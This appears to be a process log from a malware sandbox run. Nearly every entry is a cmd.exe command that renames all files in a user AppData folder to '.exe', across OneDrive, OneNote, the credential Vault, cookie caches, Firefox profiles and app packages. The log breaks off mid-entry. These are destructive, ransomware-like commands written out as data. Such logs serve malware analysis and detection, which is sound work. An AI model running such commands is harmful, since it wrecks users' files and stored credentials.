C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ru\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\rw\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sd-Arab-PK\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\si-LK\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sq\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-BA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-RS\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Latn-RS\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sv\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sw\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ta\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\te\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tg\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\th\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ti\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tk-TM\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tn-ZA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tt\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ug\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ur\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uz-Latn-UZ\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\vi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\wo\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\xh-ZA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\yo-NG\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-CN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-TW\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zu-ZA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\de\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\es\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\fr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\hu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\it\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ja\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ko\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\nl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-BR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-PT\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ru\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\sv\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\tr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-CN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-TW\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick.2\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls.2\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Extras\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Layouts\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Templates.2\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Window.2\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\Flat\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\setup\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\setup\logs\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\Backup\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\Desktop\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\InPrivate\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\InPrivate\Desktop\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileRoaming\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\0\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\1033\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\AppCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\CloudStore\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatUaCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IEDownloadHistory\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\RoamingTiles\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\SettingSync\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\AppCache\YT4NKTBJ\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\NotifyIcon\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024061120240612\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatCache\Low\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatUaCache\Low\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.IE5\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Low\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Virtualized\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\E9YVC3IR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G7AAJOBN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\REQ5K173\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\XIQH11PJ\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\DNTException\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\ESE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Low\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\wpnidm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\Gadgets\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Backup\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\oih2seup.Admin\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\cache2\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\safebrowsing\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\settings\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\startupCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\thumbnails\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\cache2\doomed\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\cache2\entries\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\settings\main\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\settings\main\ms-language-packs\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\settings\main\ms-language-packs\browser\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\settings\main\ms-language-packs\browser\newtab\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

